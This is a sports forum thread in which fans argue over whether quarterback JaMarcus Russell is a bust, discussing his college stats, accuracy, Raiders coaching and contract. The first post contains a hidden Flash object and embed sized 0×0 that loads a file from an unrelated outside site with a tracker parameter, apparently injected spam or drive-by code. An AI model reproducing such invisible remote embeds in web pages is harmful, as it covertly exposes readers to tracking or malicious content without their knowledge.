N/S Jamarcus Russell officially a bust? (1 Viewer)

Maybe he can scrounge out a decent career, but he has been utterly horrible this year.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

If you watched him at LSU, he was bad there too. I was never ever a fan of his in college. This is really no surprise.

Hasn't he had a different coach each year he has played? I can't put his slow development solely on his shoulders. He is a project and always has been. Going to the Raiders is the worst thing that could have happened to him. There is no consistency to his surroundings. There is still hope that he can be coached up, but the later it gets into his career, the thinner that hope becomes.

Al Davis has screwed that team up so badly............

Bust. Don't worry he isn't alone though..................Campbell is in line to join him soon.

I was shocked when Garcia wasn't named the starter this year to allow Russell time to develop. But I'm not even sure that he *is* going to develop. He appears to be regressing to me. They need a good QB coach to come in and fix his fundamentals. The problem with a guy with so much physical ability is that many times he will never develop sound fundamentals. His physical talent allowed him to get this far but you can't succeed in the NFL with pure physical ability alone.

I think Garcia just wanted to attend a training camp to stay in football shape. If i recall correctly, he asked for his release after the end of preseason, and you can't really blame him. Being a back up for the any team is better than being a starter for the Raiders.

If you watched him at LSU, he was bad there too. I was never ever a fan of his in college. This is really no surprise.

Jamarcus was a great if sometimes infuriating player in college. He wasn't the type of player fans like, because you could see the talent was there to be truly special, and you got flashes of that combined with some sluggish and boneheaded offense, especially in his first couple of years. But his junior year, he was unbelievable. His junior year, he was a 67% passer in a downfield passing offense and averaged a pretty great 9.1 YPA, which are Sam Bradford numbers in a Jimbo Fisher offense. Whether you like him or not or saw aspects of his game which wouldn't translate (work ethic, etc.), he was not a bad player in college. What I don't understand is how a guy who was generally very accurate in college (a few memorable ducks here or there notwithstanding, he completed a high percentage) can't hit the broad side of a barn in the pros. He doesn't look like the same guy at all.

You know, this is also something to take into consideration, that portions of his play are directly related to the terrible leadership and coaching on top of that organization. Even with that tho, his accuracy is just horrendous.

i recall i report in training camp for Raider passing drills where Russell would drop back pick his receiver, but the coaches didn't want him to actually throw the ball. They didn't want to bring his confidence down.

Jamarcus was a great if sometimes infuriating player in college. He wasn't the type of player fans like, because you could see the talent was there to be truly special, and you got flashes of that combined with some sluggish and boneheaded offense, especially in his first couple of years. But his junior year, he was unbelievable. His junior year, he was a 67% passer in a downfield passing offense and averaged a pretty great 9.1 YPA, which are Sam Bradford numbers in a Jimbo Fisher offense. Whether you like him or not or saw aspects of his game which wouldn't translate (work ethic, etc.), he was not a bad player in college. What I don't understand is how a guy who was generally very accurate in college (a few memorable ducks here or there notwithstanding, he completed a high percentage) can't hit the broad side of a barn in the pros. He doesn't look like the same guy at all.

speed of the game in the pros. He has not adjusted to it at all. Anticipation in college is quite different at the pro level. He is very uncomfortable at split second decision making.

In college he was a man among boys. Physical gifts can get you by. Not in the NFL.

The guy is just not meant to be a an NFL QB. He is a bust. It didn't matter what team he went to, he doesn't have the desire to get better. Oakland is not a bad team. They have a bad organization but any QB that is accurate would fare a whole lot better.

Sure the WRs are not studs but they do get open and Russell misses them by yards not feet. The guy will be benched soon and might never again stop foot on the field.

Oakland really needs to cut bait and let him go. To keep somebody who is clearly not cutting it as a starting QB does a major disservice to the team, the players and the fans. Unfortunately Oakland has had a recent record of making poor QB choices. Remember they signed AB after it was apparent he was not a good QB.

speed of the game in the pros. He has not adjusted to it at all. Anticipation in college is quite different at the pro level. He is very uncomfortable at split second decision making.

In college he was a man among boys. Physical gifts can get you by. Not in the NFL.

No doubt he's a poor split-second decision maker and I wasn't sold on that part of his game at LSU. But that's why he hasn't set the world on fire in general. I think there's a qualitative change between his play last year, which was mediocre, and his play this year, which is abysmal. And the major difference is his accuracy, which seems to have completely left him. And that's weird, because accuracy is mostly either something you have or you don't. Sure, there are things that can improve your accuracy (mechanics, footwork, timing and anticipation, etc.) but even coaches argue about how much you can teach a guy accuracy. He must have developed some really poor mechanics in his time in Oakland, because a quarterback of his age doesn't usually regress in this way. Some don't get better, and we call them busts, but they usually don't get this much worse.

Yes, he is. Fair or not, Raiders or not, he's just aweful.

he is easily the worst starting qb in the league. he has freakish natural ability but i dont think he has the drive to be a better qb.
playing for oakland doesnt help either though.

J. Russell was set up for failure since the day he was drafted. He had to hold out and miss the majority of the first part of the season because the Raiders did not want to pay him as the No. 1 pick. They actually wanted to pay him less than the top 3 players picked in the draft before him. If you pick someone at No. 1, you have to be prepared to pay him. Bottom line.

Not the way I remember it. Oakland was offering Russell 31 million guaranteed. The previous #1 overall got 27. Russell wanted 35. Russell wound up signing for 31. Who's at fault here? Oakland has been known for notoriously OVERpaying. Russell, because he bought into the hype like Crabtree, wanted way more than the 10-15% increase that is common each year.

Man, I am glad some of you aren't GMs. If you cut players after a bad couple of years, we wouldn't have an Elway, or hey, a Brees. There was a reason the Chargers drafted Manning/traded for Rivers. I think you give a QB 4 or 5 years to develop, not 2 or 3. Thats just my opinion.

But its already been said. Rus got drafted by a terrible organization. He is just too raw right now. All of the talent with none of the polish. Zero coaching, rookie recievers. Hell, even those RBs are underachieving.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom